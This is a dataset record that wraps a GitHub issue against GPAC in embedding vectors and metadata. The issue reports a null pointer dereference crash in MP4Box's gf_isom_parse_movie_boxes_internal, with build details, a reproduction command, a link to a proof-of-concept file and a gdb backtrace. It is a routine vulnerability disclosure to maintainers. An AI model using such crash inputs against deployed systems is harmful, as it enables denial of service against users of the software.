0.008388036862015724, 0.011691059917211533, -0.018878675997257233, 0.006934110540896654, 0.010416078381240368, 0.0000530077340954449, 0.005539832636713982, 0.002706540049985051, 0.01683572307229042, 0.010885808616876602, 0.007873570546507835, -0.015448899939656258, 0.0006295687635429204, -0.01397260557860136, -0.029153088107705116, 0.007977955043315887, -0.007672257721424103, -0.001624483149498701, -0.0011584811145439744, -0.028675902634859085, 0.008798118680715561, -0.004756948910653591, 0.03352232277393341, 0.012526135891675949, 0.0019441605545580387, 0.009320041164755821, 0.011795444414019585, 0.01674625091254711, -0.0007386132492683828, 0.019370773807168007, 0.009804683737456799, 0.011705972254276276, -0.00408963393419981, 0.0038118967786431313, -0.0006407528417184949, 0.00351738347671926, -0.002522003138437867, -0.004320770967751741, 0.02165232039988041, -0.006512844935059547, -0.030897799879312515, 0.0035285677295178175, 0.007672257721424103, 0.006576220970600843, 0.006930382456630468, -0.00509619852527976, -0.021905824542045593, 0.0017941079568117857, -0.000939460180234164, -0.003918145317584276, 0.0038995053619146347, -0.027199609205126762, -0.0011295890435576439, -0.00990906823426485, 0.01787956804037094, -0.002766188234090805, -0.011728339828550816, -0.020205849781632423, 0.0025965634267777205, -0.0063003478571772575, -0.004566820338368416, 0.012518679723143578, -0.021771617233753204, 0.007627521641552448, 0.017983950674533844, 0.008306020870804787, -0.009238025173544884, 0.0006104626809246838, 0.0070608630776405334, 0.02420228347182274, 0.006072938907891512, -0.015955910086631775, 0.003012237371876836, -0.011743252165615559, 0.04154501482844353, -0.008902503177523613, -0.013465595431625843, 0.0008094455697573721, -0.008186724036931992, -0.002289002062752843, -0.0027605961076915264, 0.0032582865096628666, 0.00698630278930068, -0.003330982755869627, 0.018297104164958, 0.0027214521542191505, 0.001985168782994151, -0.00008306486415676773, 0.02184617705643177, 0.0019646647851914167, -0.019206741824746132, 0.013599804602563381, 0.00386595306918025, 0.004507171921432018, -0.0030551094096153975, -0.01280946470797062, -0.014949345961213112, 0.017611149698495865, 0.000578774546738714, -0.017133964225649834, 0.01966901496052742, -0.006632141303271055, -0.003358942922204733, 0.008745926432311535, 0.020205849781632423, 0.0036124479956924915, 0.003703784430399537, 0.005502552259713411, -0.0012824377045035362, -0.0071391514502465725, 0.005498824175447226, 0.016701513901352882, -0.0120340371504426, -0.004417699761688709, -0.016194503754377365, 0.01052046287804842, -0.021741792559623718, -0.001169665134511888, 0.009327497333288193, -0.020205849781632423, -0.027393465861678123, -0.020683035254478455, 0.006251883693039417, 0.003675824264064431, 0.005390712060034275, 0.03924855589866638, -0.02426193095743656, 0.0062630679458379745, 0.012772184796631336, -0.008425317704677582, 0.011124401353299618, 0.013905501924455166, 0.01229499839246273, 0.00844022911041975, -0.010759055614471436, -0.009856875985860825, -0.002305778209120035, -0.013398490846157074, -0.00501045398414135, -0.0027307721320539713, 0.020504090934991837, 0.010304237715899944, 0.012705080211162567, -0.007377744652330875, -0.007724449969828129, -0.015627844259142876, -0.009088904596865177, 0.007485857233405113, -0.0005037482478655875, 0.018118159845471382, 0.0041231862269341946, -0.005107382778078318, -0.0007470013224519789, -0.0030998457223176956, 0.0243961401283741, 0.004164194222539663, 0.008335844613611698, 0.0010298645356670022, -0.004216386470943689, 0.010438445955514908, 0.02335229516029358, -0.003813760820776224, 0.022815460339188576, 0.004000161774456501, -0.02467946894466877, 0.008716102689504623, -0.027005750685930252, -0.007769186515361071, 0.00045435200445353985, -0.01494188979268074, -0.009252936579287052, 0.004082178231328726, -0.0082761961966753, 0.021219870075583458, 0.008030147291719913, -0.009446794167160988, 0.004932165611535311, -0.005461544264107943, 0.0016515112947672606, 0.006374908145517111, -0.005800793878734112, -0.00850733369588852, 0.01838657818734646, -0.00905162375420332, -0.038413483649492264, 0.007616337854415178, 0.007135423365980387, -0.0013309018686413765, 0.005998378619551659, -0.003962881397455931, 0.014315583743155003, 0.011295890435576439, 0.019892696291208267, -0.0015853389631956816, -0.003977793734520674, -0.019370773807168007, 0.009819595143198967, 0.00461155641824007, 0.011720883660018444, 0.01025950163602829, -0.002630115719512105, 0.018654994666576385, 0.006255611777305603, -0.0012805736623704433, -0.0029656370170414448, -0.0038584971334785223, -0.03426792845129967, -0.0025387792848050594, 0.007672257721424103, -0.014427423477172852, 0.0014119863044470549, -0.0023188262712210417, -0.018476050347089767, -0.0018099519656971097, 0.0006822270224802196, 0.036057375371456146, 0.015187939628958702, 0.0007418752647936344, -0.006598589010536671, -0.02062338776886463, 0.0019833047408610582, -0.0070869592018425465, -0.008186724036931992, 0.00404116977006197, -0.004257394932210445, -0.005547288339585066, -0.00938714575022459, -0.00834330078214407, -0.00825382862240076, 0.006091578863561153, 0.0012945537455379963, 0.02784082666039467, 0.0010951048461720347, 0.008880135603249073, -0.003027149476110935, 0.004257394932210445, 0.01986287161707878, -0.014949345961213112, -0.013137530535459518, 0.004548179917037487, 0.0008854038896970451, -0.017700621858239174, -0.00014947015733923763, 0.003036469453945756, 0.013018233701586723, -0.0032992945052683353, 0.007940675131976604, -0.0172085240483284, -0.012272629886865616, 0.0226514283567667, 0.012421751394867897, 0.013622172176837921, 0.018833938986063004, 0.0028631165623664856, -0.009961260482668877, 0.0010662127751857042, 0.014017341658473015, 0.0012171973939985037, 0.019847959280014038, 0.008731015026569366, -0.027020663022994995, 0.002713995985686779, -0.0010298645356670022, 0.002169705694541335, 0.02572331391274929, -0.0027531401719897985, 0.0005270483088679612, -0.006893102545291185, -0.008432772941887379, 0.0011547531466931105, 0.007791554555296898, 0.006505388766527176, -0.009528810158371925, 0.009521353989839554, 0.010274413041770458, 0.0025984274689108133, -0.007739362306892872, 0.01872955448925495, 0.004958261735737324, 0.008149444125592709, -0.007120511494576931, 0.008760838769376278, -0.0020056727807968855, 0.00131785380654037, -0.0024082986637949944, 0.00922311283648014, 0.006337628234177828, -0.009349865838885307, -0.004391603637486696, 0.004734580870717764, -0.0013765700859948993, -0.012593239545822144, 0.01574714109301567, -0.0060170185752213, 0.007694626227021217, 0.013219546526670456, 0.00990906823426485, -0.006352540105581284, 0.002576059428974986, -0.0008304156945087016, 0.0009776722872629762, 0.008224003948271275, -0.026304883882403374, 0.002682307967916131, -0.024321580305695534, -0.002121241297572851, -0.008648998104035854, 0.00019280835113022476, -0.002018720842897892, -0.009469161741435528, 0.00983450748026371, -0.015143202617764473, -0.0021659776102751493, -0.005439176224172115, 0.027438201010227203, 0.0350731797516346, 0.011966932564973831, 0.007627521641552448, 0.02071285992860794, -0.0344170480966568, 0.0006477428833022714, -0.006874462589621544, 0.027825914323329926, 0.007620065938681364, -0.014770401641726494, -0.0002868242736440152, 0.006710429675877094, -0.0025928355753421783, 0.0015527189243584871, 0.0002900862891692668, -0.018833938986063004, 0.013637084513902664, 0.02193564921617508, -0.009088904596865177, 0.006203419528901577, 0.003951697610318661, -0.014785313047468662, 0.008887591771781445, 0.006445740349590778, -0.006039386615157127, 0.02047426626086235, -0.001425966271199286, 0.005849258042871952, -0.0007195071666501462, 0.007530593313276768, 0.02202512137591839, -0.005081286653876305, -0.0007153131882660091, -0.0035807597450912, 0.012421751394867897, -0.010863440111279488, 0.0040598101913928986, 0.003985249437391758, 0.014651104807853699, -0.017387468367815018, 0.012734903953969479, -0.0040448978543281555, -0.0038473131135106087, -0.0032899745274335146, 0.012414295226335526, -0.021309342235326767, -0.010341517627239227, 0.004932165611535311, -0.011817811988294125, 0.019549718126654625, -0.0017941079568117857, 0.0012926897034049034, -0.014293215237557888, -0.016940107569098473, -0.020593563094735146, 0.0002784362295642495, 0.014487071894109249, 0.004715940915048122, 0.018073424696922302, 0.022576868534088135, 0.02705048769712448, -0.0024343947879970074, 0.011355537921190262, -0.008462597616016865, 0.013532700017094612, -0.013868221081793308, 0.0007358172442764044, -0.018744466826319695, -0.016000647097826004, 0.003280654549598694, 0.010237133130431175, -0.0056218490935862064, 0.012988409027457237, 0.017954127863049507, 0.008283652365207672, 0.006117674987763166, 0.011280978098511696, 0.0002851932658813894, 0.007403840776532888, 0.0010671446798369288, 0.0029376770835369825, 0.0038249448407441378, 0.014613824896514416, 0.0010158844524994493, -0.0082761961966753, 0.016149766743183136, 0.019162004813551903, -0.006333900149911642, 0.03713104501366615, 0.01792430318892002, 0.004276034887880087, 0.014949345961213112, 0.0019777128472924232, -0.004797957371920347, -0.006173595320433378, 0.011497203260660172, -0.0008178336429409683, 0.022755812853574753, 0.022964581847190857, -0.02208476886153221, -0.021011101081967354, 0.009275305084884167, 0.010729231871664524, 0.010565198957920074, 0.006445740349590778, 0.016433097422122955, -0.019400598481297493, 0.0022479938343167305, -0.007873570546507835, 0.01901288330554962, -0.005025366321206093, -0.0009459842112846673, -0.01868481934070587, -0.02563384175300598, 0.009946348145604134, 0.050432607531547546, -0.016850635409355164, -0.0033458948601037264, -0.00527141522616148, -0.006084122695028782, -0.008686278015375137, -0.028332924470305443, 0.016343623399734497, -0.0049880859442055225, 0.0033253906294703484, 0.013159898109734058, -0.009178376756608486, 0.010550286620855331, -0.012019124813377857, -0.0013364938786253333, -0.0038584971334785223, 0.009200744330883026, 0.004428883548825979, -0.011534483171999454, -0.0062108756974339485, 0.006456924602389336, -0.028810111805796623, 0.010319150052964687, 0.012212982401251793, 0.00553237646818161, -0.013920413330197334, -0.010773967951536179, -0.004473619628697634, -0.017133964225649834, 0.0030196933075785637, 0.002421346725896001, 0.010229676961898804, -0.025559281930327415, -0.006393548101186752, 0.005528648383915424, -0.021637408062815666, -0.0061437711119651794, 0.010043276473879814, -0.020966364070773125, 0.02500753477215767, -0.026513652876019478, -0.008283652365207672, -0.010065644979476929, 0.000389577733585611, 0.0034521431662142277, -0.0035863518714904785, -0.008358213119208813, 0.005498824175447226, -0.007072047330439091, 0.00579333771020174, -0.0016421913169324398, 0.0016393952537328005, -0.009528810158371925, 0.012265174649655819, -0.010930544696748257, 0.011467378586530685, -0.021786527708172798, 0.011832724325358868, 0.02713995985686779, -0.006583677139133215, 0.035908255726099014, 0.012280086055397987, -0.007202527951449156, 0.005651672836393118, 0.0060170185752213, 0.01744711771607399, -0.0072174398228526115, -0.00456309225410223, -0.0014567225007340312, -0.009707755409181118, 0.0017130236374214292, -0.015247587114572525, -0.006848366465419531, -0.005506280343979597, -0.004842693451792002, -0.00808233954012394, -0.00999854039400816, -0.0052527752704918385, 0.014419968239963055, 0.008783207274973392, 0.01238447055220604, -0.006069210823625326, 0.012421751394867897, 0.010587566532194614, 0.016343623399734497, 0.003304886631667614, -0.025141743943095207, 0.007277088239789009, -0.005901450291275978, 0.009238025173544884, 0.0018518922151997685, -0.013980061747133732, -0.03191182017326355, -0.012869113124907017, 0.010535374283790588, 0.007910851389169693, -0.01849096268415451, 0.01245903130620718, 0.0008504537399858236, -0.019728662446141243, 0.012734903953969479, 0.005666585173457861, 0.008991975337266922, 0.00425366684794426, -0.02198038436472416, 0.021965473890304565, 0.0008700258331373334, -0.0039815218187868595, 0.02552945725619793, -0.04733089730143547, 0.0063264439813792706, -0.02694610320031643, 0.0029432689771056175, -0.005588296800851822, -0.004581732209771872, -0.018356753513216972, -0.0005126022733747959, -0.039129260927438736, 0.00741129694506526, 0.003539751749485731, 0.017059404402971268, 0.009424425661563873, 0.012421751394867897, -0.010125292465090752, -0.0011547531466931105, -0.01090072002261877, 0.00948407407850027, 0.0022069858387112617, 0.002764324191957712, -0.013868221081793308, -0.007784098386764526, 0.009163464419543743, 0.009722666814923286, -0.01805851235985756, 0.05168522149324417, 0.014524352736771107, 0.00666569359600544, 0.004682388622313738, 0.013845853507518768, 0.015001538209617138, 0.004742037039250135, -0.02563384175300598, -0.011899828910827637, 0.006505388766527176, 0.011221329681575298, -0.018267281353473663, 0.028243452310562134, -0.0033775828778743744, 0.00040588778210803866, 0.004156738519668579, -0.003685144241899252, -0.0044251554645597935, -0.010065644979476929, -0.016865545883774757, -0.007403840776532888, 0.010505550540983677, 0.020876891911029816, -0.020742684602737427, -0.0006687129498459399, 0.0012992137344554067, 0.002732636174187064, 0.0025462352205067873, 0.01439759973436594, -0.02587243542075157, 0.01725326105952263, -0.0022088498808443546, -0.0013588620349764824, 0.013927869498729706, 0.0010000404436141253, 0.010311693884432316, 0.02572331391274929, 0.015970822423696518, -0.009812138974666595, -0.00929021742194891, -0.0008322796784341335, 0.006483020726591349, 0.0001591397012816742, -0.008947239257395267, 0.0054093520157039165, -0.019743574783205986, 0.002628251677379012, -0.0027978764846920967, -0.0015433988301083446, 0.01184018049389124, 0.008969607762992382, 0.0038845932576805353, -0.0027251800056546926, 0.00844022911041975, 0.0017391196452081203, 0.0014529944164678454, -0.009156008251011372, -0.006102763116359711, 0.004622740671038628, -0.015046274289488792, 0.004801685456186533, -0.007325552403926849, -0.027154872193932533, -0.021249694749712944, -0.01787956804037094, 0.0034577352926135063, 0.009938891977071762, 0.011385362595319748, -0.020966364070773125, 0.010960368439555168, -0.001021476462483406, 0.014509440399706364, -0.0022703621070832014, -0.0014986626338213682, -0.021547935903072357, -0.020548826083540916, 0.014800225384533405, -0.00509619852527976, 0.010110381059348583, 0.01281692087650299, -0.01749185286462307, -0.00921565666794777, 0.002768052276223898, -0.0019721207208931446, 0.004779316950589418, -0.016955019906163216, -0.013115162029862404, -0.008544613607227802, -0.008671366609632969, 0.023039141669869423, 0.007985411211848259, 0.00879066251218319, -0.02705048769712448, 0.004958261735737324, 0.014173918403685093, -0.02042953111231327, 0.0011687332298606634, -0.005062646232545376, -0.002413890790194273, 0.015210307203233242, 0.002900396939367056, 0.019743574783205986, -0.01744711771607399, -0.005454088095575571, 0.020861979573965073, -0.010334061458706856, -0.02317335084080696, -0.007221167907118797, -0.01018494088202715, 0.010677039623260498, 0.005729961208999157, 0.006889374461025, -0.022010209038853645, 0.00482405349612236, 0.024321580305695534, 0.012921305373311043, -0.003925601486116648, -0.007552961353212595, 0.007504497189074755, 0.00509619852527976, -0.008663910441100597, -0.013704189099371433, 0.035192474722862244, 0.009827051311731339, 0.020220762118697166, -0.0014045302523300052, 0.015344515442848206, 0.014591456390917301, 0.008731015026569366, 0.021637408062815666, -0.003485695458948612, -0.012861656956374645, 0.02609611488878727, 0.018520785495638847, 0.009349865838885307, 0.008074883371591568, -0.017805006355047226, 0.016209416091442108, 0.02289002202451229, 0.010766511783003807, -0.0072174398228526115, 0.04288710281252861, -0.0031035738065838814, 0.010393709875643253, -0.019370773807168007, 0.004249938763678074, 0.0029376770835369825, -0.019728662446141243, 0.009856875985860825, -0.020131289958953857, 0.015061186626553535, 0.008089795708656311, 0.007541777566075325, -0.008380580693483353, 0.0011230650125071406, -0.004689844790846109, 0.030286405235528946, 0.011646323837339878, -0.013868221081793308, 0.014255935326218605, -0.016000647097826004, -0.0021808897145092487, -0.006852094549685717, 0.012988409027457237, 0.015076098963618279, 0.02444087527692318, 0.005990922451019287, -0.017834831029176712, 0.016537481918931007, -0.0022666340228170156, -0.01810324750840664, 0.0010345245245844126, -0.0033775828778743744, -0.0058418018743395805, 0.01957954280078411, 0.00605429895222187, 0.006311532109975815, 0.005767241585999727, 0.02591717056930065, 0.008723558858036995, 0.01316735427826643, -0.005275143310427666, -0.020414618775248528, 0.0007544573163613677, 0.03391003981232643, -0.0013672501081600785, -0.0044251554645597935, -0.018505873158574104, 0.008045059628784657, 0.00034181252704001963, 0.007616337854415178, -0.007340464275330305, 0.025842610746622086, -0.016820810735225677, 0.005118566565215588, 0.03692227602005005, 0.022159330546855927, -0.0032899745274335146, 0.01281692087650299, -0.006818542256951332, 0.003409271128475666, -0.019728662446141243, -0.037190694361925125, 0.024932974949479103 ]
289
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hi, there. There is a segmentation fault caused by null pointer dereference in gf_isom_parse_movie_boxes_internal, isom_intern.c:628 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [link](https://www.mediafire.com/file/hscjpree353c8ai/mp4box-npd_gf_isom_parse_movie_boxes_internal628.zip/file) to dropbox (unzip first) Here is the trace reported by gdb: ~~~~ #0 0x00000000005a04ae in gf_isom_parse_movie_boxes_internal (mov=0x1238220, boxType=0x0, bytesMissing=0x7fffffff9318, progressive_mode=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:628 #1 0x00000000005a0c01 in gf_isom_parse_movie_boxes (mov=0x1238220, boxType=0x0, bytesMissing=0x7fffffff9318, progressive_mode=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:781 #2 0x00000000005a0f98 in gf_isom_open_file (fileName=0x7fffffffe0f0 "poc", OpenMode=GF_ISOM_OPEN_READ_DUMP, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:901 #3 0x00000000005a3e83 in gf_isom_open (fileName=0x7fffffffe0f0 "poc", OpenMode=GF_ISOM_OPEN_READ_DUMP, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_read.c:509 #4 0x00000000004164d3 in mp4boxMain (argc=0x3, argv=0x7fffffffdd78) at /mnt/data/playground/gpac/applications/mp4box/main.c:5841 #5 0x0000000000418d6b in main (argc=0x3, argv=0x7fffffffdd78) at /mnt/data/playground/gpac/applications/mp4box/main.c:6455 #6 0x0000000000caaa06 in generic_start_main () #7 0x0000000000caaff5 in __libc_start_main () #8 0x0000000000403f39 in _start () ~~~~
Segmentation fault casued by null pointer dereference using mp4box in gf_isom_parse_movie_boxes_internal, isom_intern.c:628
https://api.github.com/repos/gpac/gpac/issues/1884/comments
0
2021-08-23T06:38:47
2021-08-24T16:26:49Z
https://github.com/gpac/gpac/issues/1884
976,685,603
1,884
false
This is a GitHub Issue repo:gpac owner:gpac Title : Segmentation fault casued by null pointer dereference using mp4box in gf_isom_parse_movie_boxes_internal, isom_intern.c:628 Issue date: --- start body --- - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hi, there. There is a segmentation fault caused by null pointer dereference in gf_isom_parse_movie_boxes_internal, isom_intern.c:628 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [link](https://www.mediafire.com/file/hscjpree353c8ai/mp4box-npd_gf_isom_parse_movie_boxes_internal628.zip/file) to dropbox (unzip first) Here is the trace reported by gdb: ~~~~ #0 0x00000000005a04ae in gf_isom_parse_movie_boxes_internal (mov=0x1238220, boxType=0x0, bytesMissing=0x7fffffff9318, progressive_mode=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:628 #1 0x00000000005a0c01 in gf_isom_parse_movie_boxes (mov=0x1238220, boxType=0x0, bytesMissing=0x7fffffff9318, progressive_mode=GF_FALSE) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:781 #2 0x00000000005a0f98 in gf_isom_open_file (fileName=0x7fffffffe0f0 "poc", OpenMode=GF_ISOM_OPEN_READ_DUMP, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_intern.c:901 #3 0x00000000005a3e83 in gf_isom_open (fileName=0x7fffffffe0f0 "poc", OpenMode=GF_ISOM_OPEN_READ_DUMP, tmp_dir=0x0) at /mnt/data/playground/gpac/src/isomedia/isom_read.c:509 #4 0x00000000004164d3 in mp4boxMain (argc=0x3, argv=0x7fffffffdd78) at /mnt/data/playground/gpac/applications/mp4box/main.c:5841 #5 0x0000000000418d6b in main (argc=0x3, argv=0x7fffffffdd78) at /mnt/data/playground/gpac/applications/mp4box/main.c:6455 #6 0x0000000000caaa06 in generic_start_main () #7 0x0000000000caaff5 in __libc_start_main () #8 0x0000000000403f39 in _start () ~~~~ --- end body ---
3,017
[ -0.01780800335109234, 0.02931292913854122, -0.012707582674920559, 0.017605146393179893, 0.008027366362512112, 0.015764936804771423, -0.026762718334794044, 0.04567195102572441, -0.004154959227889776, 0.011026761494576931, -0.03671723231673241, 0.001832963665947318, 0.02367638424038887, -0.0037419989239424467, 0.002182530937716365, 0.002477761125192046, -0.004495470318943262, 0.02677720971405506, -0.028602927923202515, 0.010671760886907578, 0.03570294380187988, -0.039615198969841, -0.02212597243487835, 0.05242421105504036, -0.012751052156090736, 0.009201043285429478, -0.02667577937245369, 0.017605146393179893, 0.016924124211072922, 0.013497278094291687, 0.007096394896507263, 0.007983896881341934, -0.0016455014701932669, 0.03210946545004845, 0.05697401985526085, -0.004368684254586697, 0.03599274158477783, 0.057582590728998184, -0.001901790383271873, 0.014091361314058304, -0.01653289794921875, -0.04929440841078758, -0.028472518548369408, 0.009019920602440834, -0.01572146825492382, 0.030428646132349968, 0.002501307288184762, 0.007773794699460268, -0.03938336297869682, 0.0036822285037487745, 0.038340095430612564, -0.004691082984209061, -0.013960952870547771, -0.05680014193058014, 0.004883073270320892, -0.056887079030275345, 0.0460776649415493, 0.01140349730849266, -0.00880981795489788, 0.030515585094690323, -0.0031062576454132795, 0.03141395375132561, -0.02851598896086216, 0.005071441177278757, 0.01198309101164341, 0.041440919041633606, 0.0035989119205623865, -0.011171660386025906, -0.0119541110470891, 0.028153743594884872, -0.004140469245612621, -0.05375727638602257, 0.007824509404599667, 0.005716238636523485, 0.016808204352855682, -0.03761560469865799, 0.060973212122917175, 0.022618627175688744, -0.009925534948706627, 0.004951899871230125, -0.05503237992525101, 0.015272282995283604, -0.023632915690541267, 0.023951692506670952, 0.00496638985350728, -0.004078887403011322, -0.011265844106674194, -0.08207041025161743, -0.013794319704174995, -0.0313270166516304, 0.008476551622152328, 0.000037894307752139866, 0.002615414559841156, 0.01577942632138729, 0.012490235269069672, 0.008766348473727703, -0.01763412542641163, -0.008570735342800617, -0.03370334953069687, -0.013294420205056667, -0.01727188006043434, -0.03610866144299507, 0.01624310202896595, 0.008259204216301441, 0.003908632323145866, -0.0001022212381940335, 0.019546782597899437, -0.017040042206645012, 0.004788889549672604, 0.13539299368858337, -0.005009859334677458, -0.013395849615335464, -0.016387999057769775, 0.00013538936036638916, 0.02522679790854454, 0.021981075406074524, -0.029588235542178154, -0.012425030581653118, -0.018518004566431046, -0.033094774931669235, -0.006143688689917326, -0.02085086703300476, -0.007292008027434349, 0.0035174067597836256, -0.03341355174779892, 0.05114910751581192, -0.014547791332006454, -0.004832359030842781, -0.022560667246580124, -0.007205068599432707, -0.02742925100028515, -0.012924930080771446, 0.00018338693189434707, -0.0174022875726223, 0.01100502721965313, -0.00835338793694973, -0.02344454824924469, 0.038629889488220215, -0.01097604725509882, 0.01238156110048294, -0.06271199136972427, -0.049960941076278687, 0.02828415110707283, -0.0023419191129505634, -0.014707178808748722, -0.021459441632032394, -0.006817465648055077, -0.0020792908035218716, -0.03486253693699837, -0.028849255293607712, -0.010512372478842735, -0.026255575940012932, 0.016953103244304657, 0.015562078915536404, 0.06717485934495926, 0.004202051088213921, 0.015475139953196049, 0.03242824226617813, -0.016025753691792488, -0.01756167598068714, -0.016967592760920525, -0.033152736723423004, -0.001782249310053885, -0.02724088355898857, -0.023922711610794067, -0.020300254225730896, 0.016330040991306305, 0.02309679239988327, -0.0031026352662593126, 0.023980671539902687, -0.009461860172450542, -0.008896756917238235, 0.016924124211072922, 0.025907818228006363, -0.042310308665037155, -0.0029631706420332193, 0.007534712553024292, 0.05500340089201927, -0.015605548396706581, -0.011099210940301418, -0.01218594890087843, 0.016663307324051857, -0.009592268615961075, 0.0033797533251345158, 0.0017587033798918128, -0.022082503885030746, 0.02897966280579567, -0.036311518400907516, 0.009838595986366272, -0.003432278987020254, 0.007215936202555895, -0.004111489746719599, -0.003952101804316044, 0.005093175917863846, 0.0542789101600647, -0.01160635519772768, -0.034833554178476334, -0.011171660386025906, -0.022140461951494217, -0.01388125866651535, 0.014967995695769787, -0.01577942632138729, 0.004024550784379244, -0.02298087254166603, -0.018981680274009705, -0.007400681730359793, -0.013598707504570484, 0.033906206488609314, 0.013019113801419735, -0.00999798346310854, -0.027965374290943146, -0.023285159841179848, 0.012620643712580204, -0.0024850061163306236, 0.0008395046461373568, 0.003220365149900317, -0.008657674305140972, 0.00552787072956562, -0.012280132621526718, 0.002628093119710684, 0.021807197481393814, -0.00044556232751347125, 0.025936799123883247, -0.026748228818178177, -0.04013683274388313, -0.03387722745537758, -0.0023274291306734085, -0.016982082277536392, -0.031037218868732452, 0.03231232613325119, 0.03842703253030777, 0.018213719129562378, 0.0033598297741264105, 0.009976249188184738, 0.000282098917523399, 0.017329838126897812, 0.010744210332632065, 0.0015866365283727646, -0.012620643712580204, 0.002122760284692049, -0.008621449582278728, 0.0543658472597599, -0.0313270166516304, -0.016721265390515327, 0.005125777795910835, 0.06595771759748459, -0.013874013908207417, -0.00702756829559803, -0.01353350281715393, 0.008049101568758488, -0.009867575019598007, -0.016663307324051857, 0.0003857917618006468, 0.013019113801419735, -0.0056945038959383965, 0.001734251738525927, 0.02915354073047638, 0.005893738940358162, -0.009563288651406765, -0.001630106009542942, -0.0026262819301337004, -0.020633520558476448, -0.016199631616473198, 0.008824307471513748, 0.01653289794921875, -0.02563251182436943, -0.028139254078269005, 0.01819922775030136, -0.009469104930758476, -0.011896152049303055, -0.00118816620670259, -0.005085931159555912, -0.0229953620582819, -0.03144293650984764, 0.0003350773476995528, -0.006042259745299816, 0.030515585094690323, -0.004506337456405163, 0.009150329045951366, 0.022053522989153862, -0.003089956706389785, 0.004408531356602907, -0.03526825085282326, 0.04129602015018463, 0.020430663600564003, -0.01738779805600643, 0.0031515383161604404, 0.007925937883555889, -0.011171660386025906, 0.018460046499967575, 0.024618223309516907, 0.03387722745537758, -0.04633847996592522, 0.025081899017095566, 0.023082301020622253, 0.03173273056745529, -0.007614406757056713, 0.0032529672607779503, -0.018691882491111755, 0.025270266458392143, -0.016460448503494263, 0.0075057330541312695, -0.019039638340473175, 0.0034522023051977158, -0.020865358412265778, 0.02040168270468712, -0.029588235542178154, -0.009947269223630428, 0.002501307288184762, 0.005339502822607756, 0.02516883797943592, -0.033906206488609314, -0.04297684133052826, -0.01149768102914095, -0.014910036697983742, -0.005133023019880056, 0.00433608191087842, -0.005600320175290108, -0.025661492720246315, 0.0022622249089181423, 0.0017813437152653933, -0.0030935790855437517, -0.01957576349377632, -0.007114507257938385, 0.01969168148934841, -0.01261339895427227, -0.023806793615221977, 0.03767356276512146, -0.0773177444934845, 0.027371292933821678, 0.023430058732628822, -0.0131350327283144, 0.030254768207669258, -0.03219640627503395, 0.013432074338197708, -0.01940188556909561, -0.02414005994796753, 0.011439722031354904, 0.021517399698495865, 0.005748840514570475, -0.010186351835727692, 0.02022780478000641, 0.023864753544330597, -0.01272931694984436, -0.025357205420732498, -0.02729884348809719, 0.003687662072479725, 0.008346143178641796, 0.016721265390515327, -0.004426643718034029, 0.0008861437672749162, 0.017938410863280296, -0.009512574411928654, 0.01953229308128357, 0.017489226534962654, -0.01756167598068714, 0.004343327134847641, -0.018474536016583443, 0.008744613267481327, 0.008817062713205814, 0.014678199775516987, -0.04659929871559143, -0.018184738233685493, 0.02038719318807125, -0.004281745292246342, 0.022212911397218704, 0.010150127112865448, -0.015199833549559116, -0.011997580528259277, -0.02464720420539379, -0.01235258113592863, 0.032283343374729156, -0.051873598247766495, 0.0007915070746093988, -0.009085124358534813, -0.0024560263846069574, 0.02172025851905346, 0.027791496366262436, -0.03883275017142296, 0.01163533516228199, -0.055148299783468246, -0.0006615513702854514, 0.031703751534223557, -0.07279691100120544, -0.008520021103322506, 0.03567396476864815, -0.030979260802268982, 0.05879973620176315, -0.03323967382311821, -0.02327067032456398, -0.03860091045498848, 0.037992339581251144, -0.01982208900153637, -0.07412997633218765, -0.027632109820842743, 0.03179069235920906, 